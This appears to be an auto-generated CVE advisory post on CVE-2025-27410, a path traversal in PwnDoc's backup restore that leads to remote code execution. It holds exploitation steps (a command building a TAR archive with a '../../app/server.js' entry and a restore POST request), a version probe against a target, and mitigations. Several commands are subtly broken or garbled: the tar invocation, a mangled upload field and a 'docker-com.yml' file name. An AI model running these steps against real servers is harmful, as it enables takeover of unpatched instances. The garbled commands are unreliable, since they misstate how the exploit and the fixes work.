How CVE-2025-27410 Works
PwnDoc’s backup restore feature fails to sanitize TAR entry names during extraction, enabling path traversal. An attacker with `backups:create` and `backups:update` permissions (admin by default) can craft a malicious TAR archive containing entries like ../../app/server.js. When restored, this overwrites system files. By targeting a `.js` file loaded at runtime, restarting the container executes the attacker’s code with admin privileges. Version 1.2.0 patches this by validating TAR entry paths.
DailyCVE Form
Platform: PwnDoc
Version: <1.2.0
Vulnerability: Path Traversal→RCE
Severity: Critical
Date: 04/15/2025
What Undercode Say:
Exploitation
1. Craft Malicious TAR:
mkdir -p ../../app/ && echo "malicious_code" > ../../app/server.js tar -cvf exploit.tar ../../app/server.js
2. Upload & Trigger:
POST /api/backups/restore HTTP/1.1 Content-Type: multipart/form-data [email protected]
Detection
Check for vulnerable versions: curl -s http://target/api/version | grep -q "1.[0-1]."
Mitigation
1. Patch: Upgrade to v1.2.0+.
2. Restrict Permissions:
docker-com.yml environment: - PWN_DEFAULT_ROLE=user
3. File Integrity Monitoring:
Monitor critical .js files: auditctl -w /app/server.js -p wa -k pwn_doc_rce
4. Network Controls:
Block backup API for non-admins: iptables -A INPUT -p tcp --dport 8080 -m string --string "/api/backups" --algo bm -j DROP
References
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
